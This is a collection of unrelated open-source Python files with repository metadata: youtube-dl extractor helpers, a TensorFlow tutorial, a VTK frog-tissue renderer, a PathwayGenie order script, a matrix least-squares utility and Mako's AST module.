return self._html_search_meta('twitter:player', html,
'twitter card player')
def _sort_formats(self, formats):
if not formats:
raise ExtractorError('No video formats found')
def _formats_key(f):
# TODO remove the following workaround
from ..utils import determine_ext
if not f.get('ext') and 'url' in f:
f['ext'] = determine_ext(f['url'])
preference = f.get('preference')
if preference is None:
proto = f.get('protocol')
if proto is None:
proto = compat_urllib_parse_urlparse(f.get('url', '')).scheme
preference = 0 if proto in ['http', 'https'] else -0.1
if f.get('ext') in ['f4f', 'f4m']: # Not yet supported
preference -= 0.5
if f.get('vcodec') == 'none': # audio only
if self._downloader.params.get('prefer_free_formats'):
ORDER = ['aac', 'mp3', 'm4a', 'webm', 'ogg', 'opus']
else:
ORDER = ['webm', 'opus', 'ogg', 'mp3', 'aac', 'm4a']
ext_preference = 0
try:
audio_ext_preference = ORDER.index(f['ext'])
except ValueError:
audio_ext_preference = -1
else:
if self._downloader.params.get('prefer_free_formats'):
ORDER = ['flv', 'mp4', 'webm']
else:
ORDER = ['webm', 'flv', 'mp4']
try:
ext_preference = ORDER.index(f['ext'])
except ValueError:
ext_preference = -1
audio_ext_preference = 0
return (
preference,
f.get('language_preference') if f.get('language_preference') is not None else -1,
f.get('quality') if f.get('quality') is not None else -1,
f.get('tbr') if f.get('tbr') is not None else -1,
f.get('filesize') if f.get('filesize') is not None else -1,
f.get('vbr') if f.get('vbr') is not None else -1,
f.get('height') if f.get('height') is not None else -1,
f.get('width') if f.get('width') is not None else -1,
ext_preference,
f.get('abr') if f.get('abr') is not None else -1,
audio_ext_preference,
f.get('fps') if f.get('fps') is not None else -1,
f.get('filesize_approx') if f.get('filesize_approx') is not None else -1,
f.get('source_preference') if f.get('source_preference') is not None else -1,
f.get('format_id'),
)
formats.sort(key=_formats_key)
def _check_formats(self, formats, video_id):
if formats:
formats[:] = filter(
lambda f: self._is_valid_url(
f['url'], video_id,
item='%s video format' % f.get('format_id') if f.get('format_id') else 'video'),
formats)
def _is_valid_url(self, url, video_id, item='video'):
try:
self._request_webpage(url, video_id, 'Checking %s URL' % item)
return True
except ExtractorError as e:
if isinstance(e.cause, compat_HTTPError):
self.report_warning(
'%s URL is invalid, skipping' % item, video_id)
return False
raise
def http_scheme(self):
""" Either "http:" or "https:", depending on the user's preferences """
return (
'http:'
if self._downloader.params.get('prefer_insecure', False)
else 'https:')
def _proto_relative_url(self, url, scheme=None):
if url is None:
return url
if url.startswith('//'):
if scheme is None:
scheme = self.http_scheme()
return scheme + url
else:
return url
def _sleep(self, timeout, video_id, msg_template=None):
if msg_template is None:
msg_template = '%(video_id)s: Waiting for %(timeout)s seconds'
msg = msg_template % {'video_id': video_id, 'timeout': timeout}
self.to_screen(msg)
time.sleep(timeout)
def _extract_f4m_formats(self, manifest_url, video_id, preference=None, f4m_id=None):
manifest = self._download_xml(
manifest_url, video_id, 'Downloading f4m manifest',
'Unable to download f4m manifest')
formats = []
manifest_version = '1.0'
media_nodes = manifest.findall('{http://ns.adobe.com/f4m/1.0}media')
if not media_nodes:
manifest_version = '2.0'
media_nodes = manifest.findall('{http://ns.adobe.com/f4m/2.0}media')
for i, media_el in enumerate(media_nodes):
if manifest_version == '2.0':
manifest_url = ('/'.join(manifest_url.split('/')[:-1]) + '/'
+ (media_el.attrib.get('href') or media_el.attrib.get('url')))
tbr = int_or_none(media_el.attrib.get('bitrate'))
formats.append({
'format_id': '-'.join(filter(None, [f4m_id, 'f4m-%d' % (i if tbr is None else tbr)])),
'url': manifest_url,
'ext': 'flv',
'tbr': tbr,
'width': int_or_none(media_el.attrib.get('width')),
'height': int_or_none(media_el.attrib.get('height')),
'preference': preference,
})
self._sort_formats(formats)
return formats
def _extract_m3u8_formats(self, m3u8_url, video_id, ext=None,
entry_protocol='m3u8', preference=None,
m3u8_id=None):
formats = [{
'format_id': '-'.join(filter(None, [m3u8_id, 'm3u8-meta'])),
'url': m3u8_url,
'ext': ext,
'protocol': 'm3u8',
'preference': -1,
'resolution': 'multiple',
'format_note': 'Quality selection URL',
}]
format_url = lambda u: (
u
if re.match(r'^https?://', u)
else compat_urlparse.urljoin(m3u8_url, u))
m3u8_doc = self._download_webpage(
m3u8_url, video_id,
note='Downloading m3u8 information',
errnote='Failed to download m3u8 information')
last_info = None
last_media = None
kv_rex = re.compile(
r'(?P<key>[a-zA-Z_-]+)=(?P<val>"[^"]+"|[^",]+)(?:,|$)')
for line in m3u8_doc.splitlines():
if line.startswith('#EXT-X-STREAM-INF:'):
last_info = {}
for m in kv_rex.finditer(line):
v = m.group('val')
if v.startswith('"'):
v = v[1:-1]
last_info[m.group('key')] = v
elif line.startswith('#EXT-X-MEDIA:'):
last_media = {}
for m in kv_rex.finditer(line):
v = m.group('val')
if v.startswith('"'):
v = v[1:-1]
last_media[m.group('key')] = v
elif line.startswith('#') or not line.strip():
continue
else:
if last_info is None:
formats.append({'url': format_url(line)})
continue
tbr = int_or_none(last_info.get('BANDWIDTH'), scale=1000)
f = {
'format_id': '-'.join(filter(None, [m3u8_id, 'm3u8-%d' % (tbr if tbr else len(formats))])),
'url': format_url(line.strip()),
'tbr': tbr,
'ext': ext,
'protocol': entry_protocol,
'preference': preference,
}
codecs = last_info.get('CODECS')
if codecs:
# TODO: it looks like the video codec does not necessarily always go first
va_codecs = codecs.split(',')
if va_codecs[0]:
f['vcodec'] = va_codecs[0].partition('.')[0]
if len(va_codecs) > 1 and va_codecs[1]:
f['acodec'] = va_codecs[1].partition('.')[0]
resolution = last_info.get('RESOLUTION')
if resolution:
width_str, height_str = resolution.split('x')
f['width'] = int(width_str)
f['height'] = int(height_str)
if last_media is not None:
f['m3u8_media'] = last_media
last_media = None
formats.append(f)
last_info = {}
self._sort_formats(formats)
return formats
# TODO: improve extraction
def _extract_smil_formats(self, smil_url, video_id, fatal=True):
smil = self._download_xml(
smil_url, video_id, 'Downloading SMIL file',
'Unable to download SMIL file', fatal=fatal)
if smil is False:
assert not fatal
return []
base = smil.find('./head/meta').get('base')
formats = []
rtmp_count = 0
for video in smil.findall('./body/switch/video'):
src = video.get('src')
if not src:
continue
bitrate = int_or_none(video.get('system-bitrate') or video.get('systemBitrate'), 1000)
width = int_or_none(video.get('width'))
height = int_or_none(video.get('height'))
proto = video.get('proto')
if not proto:
if base:
if base.startswith('rtmp'):
proto = 'rtmp'
elif base.startswith('http'):
proto = 'http'
ext = video.get('ext')
if proto == 'm3u8':
formats.extend(self._extract_m3u8_formats(src, video_id, ext))
elif proto == 'rtmp':
rtmp_count += 1
streamer = video.get('streamer') or base
formats.append({
'url': streamer,
'play_path': src,
'ext': 'flv',
'format_id': 'rtmp-%d' % (rtmp_count if bitrate is None else bitrate),
'tbr': bitrate,
'width': width,
'height': height,
})
self._sort_formats(formats)
return formats
def _live_title(self, name):
""" Generate the title for a live video """
now = datetime.datetime.now()
now_str = now.strftime("%Y-%m-%d %H:%M")
return name + ' ' + now_str
def _int(self, v, name, fatal=False, **kwargs):
res = int_or_none(v, **kwargs)
if 'get_attr' in kwargs:
print(getattr(v, kwargs['get_attr']))
if res is None:
msg = 'Failed to extract %s: Could not parse value %r' % (name, v)
if fatal:
raise ExtractorError(msg)
else:
self._downloader.report_warning(msg)
return res
def _float(self, v, name, fatal=False, **kwargs):
res = float_or_none(v, **kwargs)
if res is None:
msg = 'Failed to extract %s: Could not parse value %r' % (name, v)
if fatal:
raise ExtractorError(msg)
else:
self._downloader.report_warning(msg)
return res
def _set_cookie(self, domain, name, value, expire_time=None):
cookie = compat_cookiejar.Cookie(
0, name, value, None, None, domain, None,
None, '/', True, False, expire_time, '', None, None, None)
self._downloader.cookiejar.set_cookie(cookie)
def get_testcases(self, include_onlymatching=False):
t = getattr(self, '_TEST', None)
if t:
assert not hasattr(self, '_TESTS'), \
'%s has _TEST and _TESTS' % type(self).__name__
tests = [t]
else:
tests = getattr(self, '_TESTS', [])
for t in tests:
if not include_onlymatching and t.get('only_matching', False):
continue
t['name'] = type(self).__name__[:-len('IE')]
yield t
def is_suitable(self, age_limit):
""" Test whether the extractor is generally suitable for the given
age limit (i.e. pornographic sites are not, all others usually are) """
any_restricted = False
for tc in self.get_testcases(include_onlymatching=False):
if 'playlist' in tc:
tc = tc['playlist'][0]
is_restricted = age_restricted(
tc.get('info_dict', {}).get('age_limit'), age_limit)
if not is_restricted:
return True
any_restricted = any_restricted or is_restricted
return not any_restricted
class SearchInfoExtractor(InfoExtractor):
"""
Base class for paged search queries extractors.
They accept urls in the format _SEARCH_KEY(|all|[0-9]):{query}
Instances should define _SEARCH_KEY and _MAX_RESULTS.
"""
@classmethod
def _make_valid_url(cls):
return r'%s(?P<prefix>|[1-9][0-9]*|all):(?P<query>[\s\S]+)' % cls._SEARCH_KEY
@classmethod
def suitable(cls, url):
return re.match(cls._make_valid_url(), url) is not None
def _real_extract(self, query):
mobj = re.match(self._make_valid_url(), query)
if mobj is None:
raise ExtractorError('Invalid search query "%s"' % query)
prefix = mobj.group('prefix')
query = mobj.group('query')
if prefix == '':
return self._get_n_results(query, 1)
elif prefix == 'all':
return self._get_n_results(query, self._MAX_RESULTS)
else:
n = int(prefix)
if n <= 0:
raise ExtractorError('invalid download number %s for query "%s"' % (n, query))
elif n > self._MAX_RESULTS:
self._downloader.report_warning('%s returns max %i results (you requested %i)' % (self._SEARCH_KEY, self._MAX_RESULTS, n))
n = self._MAX_RESULTS
return self._get_n_results(query, n)
def _get_n_results(self, query, n):
"""Get a specified number of results for a query"""
raise NotImplementedError("This method must be implemented by subclasses")
@property
def SEARCH_KEY(self):
return self._SEARCH_KEY
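# Editor's note: illustrative query strings accepted by _make_valid_url()
# above, assuming a hypothetical subclass with _SEARCH_KEY = 'examplesearch':
#   'examplesearch:some query'     -> first result only (empty prefix)
#   'examplesearch5:some query'    -> first five results
#   'examplesearchall:some query'  -> up to _MAX_RESULTS results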
|
marado/youtube-dl
|
youtube_dl/extractor/common.py
|
Python
|
unlicense
| 43,875
|
[
"VisIt"
] |
55126af7286036adec46b2f452918ad1508ed7b5178aa9e7203cb4866ec5fd03
|
"""Summary of tensorflow basics.
Parag K. Mital, Jan 2016."""
# %% Import tensorflow and pyplot
import tensorflow as tf
import matplotlib.pyplot as plt
# %% tf.Graph represents a collection of tf.Operations
# You can create operations by writing out equations.
# By default, there is a graph: tf.get_default_graph()
# and any new operations are added to this graph.
# The result of a tf.Operation is a tf.Tensor, which holds
# the values.
# %% First a tf.Tensor
n_values = 32
x = tf.linspace(-3.0, 3.0, n_values)
# %% Construct a tf.Session to execute the graph.
sess = tf.Session()
result = sess.run(x)
# %% Alternatively pass a session to the eval fn:
x.eval(session=sess)
# x.eval() does not work, as it requires a session!
# %% We can setup an interactive session if we don't
# want to keep passing the session around:
sess.close()
sess = tf.InteractiveSession()
# %% Now this will work!
x.eval()
# %% Now a tf.Operation
# We'll use our values from [-3, 3] to create a Gaussian Distribution
sigma = 1.0
mean = 0.0
z = (tf.exp(tf.neg(tf.pow(x - mean, 2.0) /
(2.0 * tf.pow(sigma, 2.0)))) *
(1.0 / (sigma * tf.sqrt(2.0 * 3.1415))))
# %% By default, new operations are added to the default Graph
assert z.graph is tf.get_default_graph()
# %% Execute the graph and plot the result
plt.plot(z.eval())
# %% We can find out the shape of a tensor like so:
print(z.get_shape())
# %% Or in a more friendly format
print(z.get_shape().as_list())
# %% Sometimes we may not know the shape of a tensor
# until it is computed in the graph. In that case
# we should use the tf.shape fn, which will return a
# Tensor which can be eval'ed, rather than a discrete
# value of tf.Dimension
print(tf.shape(z).eval())
# %% We can combine tensors like so:
print(tf.pack([tf.shape(z), tf.shape(z), [3], [4]]).eval())
# %% Let's multiply the two to get a 2d gaussian
z_2d = tf.matmul(tf.reshape(z, [n_values, 1]), tf.reshape(z, [1, n_values]))
# %% Execute the graph and plot the resulting 2d gaussian.
plt.imshow(z_2d.eval())
# %% For fun let's create a gabor patch:
x = tf.reshape(tf.sin(tf.linspace(-3.0, 3.0, n_values)), [n_values, 1])
y = tf.reshape(tf.ones_like(x), [1, n_values])
z = tf.mul(tf.matmul(x, y), z_2d)
plt.imshow(z.eval())
# %% We can also list all the operations of a graph:
ops = tf.get_default_graph().get_operations()
print([op.name for op in ops])
# %% Lets try creating a generic function for computing the same thing:
def gabor(n_values=32, sigma=1.0, mean=0.0):
x = tf.linspace(-3.0, 3.0, n_values)
z = (tf.exp(tf.neg(tf.pow(x - mean, 2.0) /
(2.0 * tf.pow(sigma, 2.0)))) *
(1.0 / (sigma * tf.sqrt(2.0 * 3.1415))))
gauss_kernel = tf.matmul(
tf.reshape(z, [n_values, 1]), tf.reshape(z, [1, n_values]))
x = tf.reshape(tf.sin(tf.linspace(-3.0, 3.0, n_values)), [n_values, 1])
y = tf.reshape(tf.ones_like(x), [1, n_values])
gabor_kernel = tf.mul(tf.matmul(x, y), gauss_kernel)
return gabor_kernel
# %% Confirm this does something:
plt.imshow(gabor().eval())
# %% And another function which can convolve
def convolve(img, W):
# The W matrix is only 2D
# But conv2d will need a tensor which is 4d:
# height x width x n_input x n_output
if len(W.get_shape()) == 2:
dims = W.get_shape().as_list() + [1, 1]
W = tf.reshape(W, dims)
if len(img.get_shape()) == 2:
# num x height x width x channels
dims = [1] + img.get_shape().as_list() + [1]
img = tf.reshape(img, dims)
elif len(img.get_shape()) == 3:
dims = [1] + img.get_shape().as_list()
img = tf.reshape(img, dims)
# if the image is 3 channels, then our convolution
# kernel needs to be repeated for each input channel
W = tf.concat(2, [W, W, W])
# Stride is how many values to skip for the dimensions of
# num, height, width, channels
convolved = tf.nn.conv2d(img, W,
strides=[1, 1, 1, 1], padding='SAME')
return convolved
# %% Load up an image:
from skimage import data
img = data.astronaut()
plt.imshow(img)
print(img.shape)
# %% Now create a placeholder for our graph which can store any input:
x = tf.placeholder(tf.float32, shape=img.shape)
# %% And a graph which can convolve our image with a gabor
out = convolve(x, gabor())
# %% Now send the image into the graph and compute the result
result = tf.squeeze(out).eval(feed_dict={x: img})
plt.imshow(result)
|
apoorva-sharma/deep-frame-interpolation
|
tensorflow_tutorials-master/python/01_basics.py
|
Python
|
mit
| 4,497
|
[
"Gaussian"
] |
77671f18e525da8a50129a07bf2f33883acf5ba345b7ef41bd4cd484c5df2642
|
# -*- coding: utf-8 -*-
"""
Created on Wed Sep 16 14:27:37 2015
@author: Jaromir Camphuijsen (6042473) and Eva van Weel(10244743)
"""
import Tkinter, random
import vtk
from vtk.tk.vtkTkRenderWidget import vtkTkRenderWidget
from Tkinter import *
# Create the renderer and the GUI
class Tissue(object):
def __init__(self, name, val, colour):
self.name = name
self.val = val
self.R = colour[0]
self.G = colour[1]
self.B = colour[2]
self.opacity = 0
self.check = None
def setOpacity(self, v):
self.opacity = v
def setCheck(self, check):
self.check = check
def createOTF(tissues):
OTF = vtk.vtkPiecewiseFunction()
OTF.AddPoint(0, 0)
for t in tissues:
OTF.AddPoint(t.val - 0.5, 0)
OTF.AddPoint(t.val, t.opacity)
OTF.AddPoint(t.val + 0.5, 0)
OTF.AddPoint(17.0, 0)
return OTF
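# Editor's note: for a tissue with val == 6 and opacity 0.1, the loop above
# adds the points (5.5, 0), (6, 0.1) and (6.5, 0), so only voxels carrying
# that tissue label become visible in the volume rendering.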
def createSkinOTF(tissues):
skinOTF = vtk.vtkPiecewiseFunction()
skinOTF.AddPoint(70, 0)
skinOTF.AddPoint(80, tissues[15].opacity *.5)
skinOTF.AddPoint(90, tissues[15].opacity *.5)
skinOTF.AddPoint(100.0, 0)
return skinOTF
def createCTF(tissues):
CTF = vtk.vtkColorTransferFunction()
for tissue in tissues:
CTF.AddRGBPoint(tissue.val, tissue.R, tissue.G, tissue.B)
return CTF
def createSkinCTF(tissues):
skinCTF = vtk.vtkColorTransferFunction()
skinCTF.AddRGBPoint(1, 0,0,0)
skinCTF.AddRGBPoint(2, tissues[15].R, tissues[15].G, tissues[15].B)
skinCTF.AddRGBPoint(255, tissues[15].R, tissues[15].G, tissues[15].B)
return skinCTF
def update(tissues, tissue, opacityDict):
tissue.setOpacity(opacityDict[tissue].get())
if tissue.name == "Skin":
print tissue.name
skinOTF = createSkinOTF(tissues)
skinVolumeProperty.SetScalarOpacity(skinOTF)
else:
OTF = createOTF(tissues)
volumeProperty.SetScalarOpacity(OTF)
renWin.Render()
def selectAllTissues(tissues):
for t in tissues:
t.check.select()
t.setOpacity(.1)
OTF = createOTF(tissues)
volumeProperty.SetScalarOpacity(OTF)
skinOTF = createSkinOTF(tissues)
skinVolumeProperty.SetScalarOpacity(skinOTF)
renWin.Render()
def deselectAllTissues(tissues):
for t in tissues:
t.check.deselect()
t.setOpacity(0)
OTF = createOTF(tissues)
volumeProperty.SetScalarOpacity(OTF)
skinOTF = createSkinOTF(tissues)
skinVolumeProperty.SetScalarOpacity(skinOTF)
renWin.Render()
if __name__ == "__main__":
tissues = [
Tissue("Blood", 1, [0.75, 0.0, 0.0]),
Tissue("Brain", 2, [0.65, 0.65, 0.6]),
Tissue("Duodenum", 3, [0.75, 0.75, 0.0]),
Tissue("Eye retina", 4, [1.0, 0.4, 0.0]),
Tissue("Eye white", 5, [1, 1, 1]),
Tissue("Heart", 6, [0.4, 0.0, 0.0]),
Tissue("Ileum", 7, [0.6, 0.3, 0.15]),
Tissue("Kidney", 8, [0.40, 0.3, 0.2]),
Tissue("Large intestine", 9, [0.80, 0.20, 0.20]),
Tissue("Liver", 10, [0.0, 1.0, 1.0]),
Tissue("Lung", 11, [0.1, 0.1, 0.1]),
Tissue("Nerve", 12, [0.0, 0.8, 0.3]),
Tissue("Skeleton", 13, [.9, .9, .9]),
Tissue("Spleen", 14, [0.75, 0.0, 0.85]),
Tissue("Stomach", 15, [0.6, 0.6, 0.2]),
Tissue("Skin", 16, [0.20, 0.40, 0.0])
]
root = Tkinter.Tk()
aRenderer = vtk.vtkRenderer()
aRenderer.GradientBackgroundOn()
aRenderer.SetBackground(0,0,0)
aRenderer.SetBackground2(0,0,.1)
renderWidget = vtkTkRenderWidget(root,width=800,height=600)
renderWidget.grid(column=0, rowspan=len(tissues) + 4)
renWin = renderWidget.GetRenderWindow()
renWin.AddRenderer(aRenderer)
aRenderer.SetBackground(1, 1, 1)
renWin.SetSize(600, 480)
reader = vtk.vtkImageReader()
reader.SetDataExtent(0,499,0,469,1,136)
reader.SetDataSpacing(1,1,1.5)
reader.SetDataScalarTypeToUnsignedChar()
reader.SetFilePattern("./WholeFrog/frogTissue.%s%03d.raw")
reader.Update()
readerSkin = vtk.vtkImageReader()
readerSkin.SetDataExtent(0,499,0,469,1,136)
readerSkin.SetDataSpacing(1,1,1.5)
readerSkin.SetDataScalarTypeToUnsignedChar()
readerSkin.SetFilePattern("./WholeFrog/frog.%s%03d.raw")
readerSkin.Update()
# create color transfer function (static)
CTF = createCTF(tissues)
skinCTF = createSkinCTF(tissues)
# create OTF (dynamic by changing checkboxes)
OTF = createOTF(tissues)
skinOTF = createSkinOTF(tissues)
# The property describes how the data will look
volumeProperty = vtk.vtkVolumeProperty()
volumeProperty.SetColor(CTF)
volumeProperty.SetScalarOpacity(OTF)
volumeProperty.SetInterpolationTypeToLinear()
skinVolumeProperty = vtk.vtkVolumeProperty()
skinVolumeProperty.SetColor(skinCTF)
skinVolumeProperty.SetScalarOpacity(skinOTF)
# skinVolumeProperty.ShadeOn()
skinVolumeProperty.SetInterpolationTypeToLinear()
# The mapper / ray cast function know how to render the data
compositeFunction = vtk.vtkVolumeRayCastCompositeFunction()
volumeMapper = vtk.vtkVolumeRayCastMapper()
volumeMapper.SetVolumeRayCastFunction(compositeFunction)
volumeMapper.SetInputConnection(reader.GetOutputPort())
skinCompositeFunction = vtk.vtkVolumeRayCastCompositeFunction()
skinVolumeMapper = vtk.vtkVolumeRayCastMapper()
skinVolumeMapper.SetVolumeRayCastFunction(skinCompositeFunction)
skinVolumeMapper.SetInputConnection(readerSkin.GetOutputPort())
# The volume holds the mapper and the property and
# can be used to position/orient the volume
volume = vtk.vtkVolume()
volume.SetMapper(volumeMapper)
volume.SetProperty(volumeProperty)
skinVolume = vtk.vtkVolume()
skinVolume.SetMapper(skinVolumeMapper)
skinVolume.SetProperty(skinVolumeProperty)
aRenderer.AddVolume(volume)
aRenderer.AddVolume(skinVolume)
aCamera = vtk.vtkCamera()
aRenderer.SetActiveCamera(aCamera)
aCamera.SetPosition(0,0,-1)
aCamera.Azimuth(-25)
aCamera.Roll(90)
aRenderer.ResetCamera() #Without this camera Reset, the actors will not
# be displayed on starting the visualization
aCamera.Dolly(1.3)
renWin.Render()
Label(root, text="""Choose tissue(s) to visualize:""", justify = LEFT, padx = 20).grid(row = 0, rowspan=2, column=1)
varDict = {}
for tissue in tissues:
varDict[tissue] = DoubleVar()
varDict[tissue].set(0)
bgColour = '#%02x%02x%02x' % (tissue.R * 255, tissue.G * 255, tissue.B * 255)
tissue.setCheck(Checkbutton(root, text=tissue.name, offvalue = 0, onvalue = .1, variable = varDict[tissue], bg= bgColour,
command=lambda tissue = tissue: update(tissues, tissue, varDict)))
tissue.check.grid(row=tissue.val + 3, column=1, columnspan = 2, sticky="w", padx = 10)
Button(root, text = "All Tissues", command=lambda tissues = tissues: selectAllTissues(tissues) ).grid(column=1, row=2, sticky="w")
Button(root, text = "No Tissues", command=lambda tissues = tissues: deselectAllTissues(tissues) ).grid(column=2, row=2, sticky="w")
root.mainloop()
|
JaroCamphuijsen/SVVR
|
Assignment 4/Assignment4.py
|
Python
|
gpl-2.0
| 7,185
|
[
"VTK"
] |
8e7ad64abde9ec7db9ef9ea55c7050cfd9f6264ff0f5641156939e5faf640795
|
'''
PathwayGenie (c) University of Manchester 2017
PathwayGenie is licensed under the MIT License.
To view a copy of this license, visit <http://opensource.org/licenses/MIT/>.
@author: neilswainston
'''
import sys
from assembly_genie.build import BuildGenieBase
def main(args):
'''main method.'''
genie = BuildGenieBase({'ice': {'url': args[0],
'username': args[1],
'password': args[2]},
'ice_ids': args[3:]})
entries = genie.get_order()
for entry in entries:
print '\t'.join([str(val) if val else '' for val in entry])
if __name__ == '__main__':
main(sys.argv[1:])
|
synbiochem/PathwayGenie
|
assembly_genie/order.py
|
Python
|
mit
| 705
|
[
"VisIt"
] |
0cc0be3206bbc40363069bc9652575aa5bdfc9137f87dbea70771d9673a8ffd6
|
'''
matrix.py
Basic operations with matrixes:
- multiply
- transpose
- invert
And a simple linear least squares solver,
performing a linear fit between two vectors
yi = a+b.xi
Revision History
rev Date Description
0.1 2013.02.13 first issue, basic insanity check
Rafael Rossi
RaRossi@external.technip.com
rossirafael@yahoo.com
'''
#importing deepcopy to copy list and make sure the
#original lists are not altered
from copy import deepcopy
'''
matrix A with m rows and n columns
matrix B with o rows and p columns
AB = A.B with m rows and o columns
constraint: n==o
'''
def mmult(A,B):
n=len(A)
m=len(A[0])
p=len(B)
o=len(B[0])
if not n==o: return 0
AB=[[0.0 for i in range(m)] for j in range(p)]
for i in range(m):
for j in range(p):
AB[j][i]=0.0
for k in range(n):
AB[j][i]+=A[k][i]*B[j][k]
return AB
'''
returns the transpose of a matrix
matrix A with m rows and n columns
'''
def transpose(A):
n=len(A)
m=len(A[0])
B=[[0.0 for i in range(n)] for j in range(m)]
for i in range(m):
for j in range(n):
B[i][j]=A[j][i]
return B
'''
returns the inverse of a *square* matrix
'''
def minverse(Ao):
A=deepcopy(Ao)
m = len(A)
if not m==len(A[0]): return 0
#create zero matrix
AI=[[0.0 for i in range(m)] for j in range(m)]
#fill identity matrix
for i in range(m): AI[i][i]=1.0
#invert - Gaussian elimination
for k in range(m):
for i in range(k,m):
tmp = 1.0 * A[k][i]
for j in range(k,m):
A[j][i] /= tmp
for j in range(m):
AI[j][i] /= tmp
for i in range(k+1,m):
for j in range(k,m):
A[j][i]-= A[j][k]
for j in range(m):
AI[j][i] -= AI[j][k]
for i in range(m-2, -1, -1):
for j in range(m-1, i, -1):
for k in range(m):
AI[k][i] -= A[j][i] * AI[k][j]
for k in range(m):
A[k][i] -= A[j][i]*A[k][j]
return AI
'''
perform linear least squares fit between
2 vectors xo and yo.
returns coefficients a and b such that
yoi = a+b.xoi
constraints: both xo and yo need to be row
vectors (flat lists, e.g. xo=[n,n,n,n]) of the same size.
'''
def leastsquares(xo,yo):
n=len(xo)
if not n==len(yo): return 0
y=[deepcopy(yo)]
x=[[1]*n,deepcopy(xo)]
return mmult(mmult(minverse(mmult(transpose(x),x)),transpose(x)),y)[0]
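# Editor's sketch (not part of the original module): a small self-check of
# leastsquares() on exactly linear data; the variable names are hypothetical.
if __name__ == '__main__':
    demo_x = [0.0, 1.0, 2.0, 3.0]
    demo_y = [1.0, 3.0, 5.0, 7.0]  # y = 1 + 2*x
    a, b = leastsquares(demo_x, demo_y)
    print('a = %s, b = %s (expected roughly 1.0 and 2.0)' % (a, b))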
|
haphaeu/yoshimi
|
GumbleBootstrap/matrix.py
|
Python
|
lgpl-3.0
| 2,495
|
[
"Gaussian"
] |
ee4f374b31afc8bc0862fafeb7e919e9b17761cdf548c6f5d8b4cf52a6160a7e
|
# mako/ast.py
# Copyright (C) 2006-2015 the Mako authors and contributors <see AUTHORS file>
#
# This module is part of Mako and is released under
# the MIT License: http://www.opensource.org/licenses/mit-license.php
"""utilities for analyzing expressions and blocks of Python
code, as well as generating Python from AST nodes"""
from mako import exceptions, pyparser, compat
import re
class PythonCode(object):
"""represents information about a string containing Python code"""
def __init__(self, code, **exception_kwargs):
self.code = code
# represents all identifiers which are assigned to at some point in
# the code
self.declared_identifiers = set()
# represents all identifiers which are referenced before their
# assignment, if any
self.undeclared_identifiers = set()
# note that an identifier can be in both the undeclared and declared
# lists.
# using AST to parse instead of using code.co_varnames,
# code.co_names has several advantages:
# - we can locate an identifier as "undeclared" even if
# it's declared later in the same block of code
# - AST is less likely to break with version changes
# (for example, the behavior of co_names changed a little bit
# in python version 2.5)
if isinstance(code, compat.string_types):
expr = pyparser.parse(code.lstrip(), "exec", **exception_kwargs)
else:
expr = code
f = pyparser.FindIdentifiers(self, **exception_kwargs)
f.visit(expr)
class ArgumentList(object):
"""parses a fragment of code as a comma-separated list of expressions"""
def __init__(self, code, **exception_kwargs):
self.codeargs = []
self.args = []
self.declared_identifiers = set()
self.undeclared_identifiers = set()
if isinstance(code, compat.string_types):
if re.match(r"\S", code) and not re.match(r",\s*$", code):
# if there's text and no trailing comma, ensure it's parsed
# as a tuple by adding a trailing comma
code += ","
expr = pyparser.parse(code, "exec", **exception_kwargs)
else:
expr = code
f = pyparser.FindTuple(self, PythonCode, **exception_kwargs)
f.visit(expr)
class PythonFragment(PythonCode):
"""extends PythonCode to provide identifier lookups in partial control
statements
e.g.
for x in 5:
elif y==9:
except (MyException, e):
etc.
"""
def __init__(self, code, **exception_kwargs):
m = re.match(r'^(\w+)(?:\s+(.*?))?:\s*(#|$)', code.strip(), re.S)
if not m:
raise exceptions.CompileException(
"Fragment '%s' is not a partial control statement" %
code, **exception_kwargs)
if m.group(3):
code = code[:m.start(3)]
(keyword, expr) = m.group(1, 2)
if keyword in ['for', 'if', 'while']:
code = code + "pass"
elif keyword == 'try':
code = code + "pass\nexcept:pass"
elif keyword == 'elif' or keyword == 'else':
code = "if False:pass\n" + code + "pass"
elif keyword == 'except':
code = "try:pass\n" + code + "pass"
elif keyword == 'with':
code = code + "pass"
else:
raise exceptions.CompileException(
"Unsupported control keyword: '%s'" %
keyword, **exception_kwargs)
super(PythonFragment, self).__init__(code, **exception_kwargs)
class FunctionDecl(object):
"""function declaration"""
def __init__(self, code, allow_kwargs=True, **exception_kwargs):
self.code = code
expr = pyparser.parse(code, "exec", **exception_kwargs)
f = pyparser.ParseFunc(self, **exception_kwargs)
f.visit(expr)
if not hasattr(self, 'funcname'):
raise exceptions.CompileException(
"Code '%s' is not a function declaration" % code,
**exception_kwargs)
if not allow_kwargs and self.kwargs:
raise exceptions.CompileException(
"'**%s' keyword argument not allowed here" %
self.kwargnames[-1], **exception_kwargs)
def get_argument_expressions(self, as_call=False):
"""Return the argument declarations of this FunctionDecl as a printable
list.
By default the return value is appropriate for writing in a ``def``;
set `as_call` to true to build arguments to be passed to the function
instead (assuming locals with the same names as the arguments exist).
"""
namedecls = []
# Build in reverse order, since defaults and slurpy args come last
argnames = self.argnames[::-1]
kwargnames = self.kwargnames[::-1]
defaults = self.defaults[::-1]
kwdefaults = self.kwdefaults[::-1]
# Named arguments
if self.kwargs:
namedecls.append("**" + kwargnames.pop(0))
for name in kwargnames:
# Keyword-only arguments must always be used by name, so even if
# this is a call, print out `foo=foo`
if as_call:
namedecls.append("%s=%s" % (name, name))
elif kwdefaults:
default = kwdefaults.pop(0)
if default is None:
# The AST always gives kwargs a default, since you can do
# `def foo(*, a=1, b, c=3)`
namedecls.append(name)
else:
namedecls.append("%s=%s" % (
name, pyparser.ExpressionGenerator(default).value()))
else:
namedecls.append(name)
# Positional arguments
if self.varargs:
namedecls.append("*" + argnames.pop(0))
for name in argnames:
if as_call or not defaults:
namedecls.append(name)
else:
default = defaults.pop(0)
namedecls.append("%s=%s" % (
name, pyparser.ExpressionGenerator(default).value()))
namedecls.reverse()
return namedecls
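# Editor's note (illustrative, not from the original source): for a
# declaration such as "def render(context, x, y=2, *args, **kwargs)" the
# method above is expected to return roughly
#   ['context', 'x', 'y=2', '*args', '**kwargs']   by default, and
#   ['context', 'x', 'y', '*args', '**kwargs']     when as_call=True.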
@property
def allargnames(self):
return tuple(self.argnames) + tuple(self.kwargnames)
class FunctionArgs(FunctionDecl):
"""the argument portion of a function declaration"""
def __init__(self, code, **kwargs):
super(FunctionArgs, self).__init__("def ANON(%s):pass" % code,
**kwargs)
|
znoland3/zachdemo
|
venvdir/lib/python3.4/site-packages/mako/ast.py
|
Python
|
mit
| 6,635
|
[
"VisIt"
] |
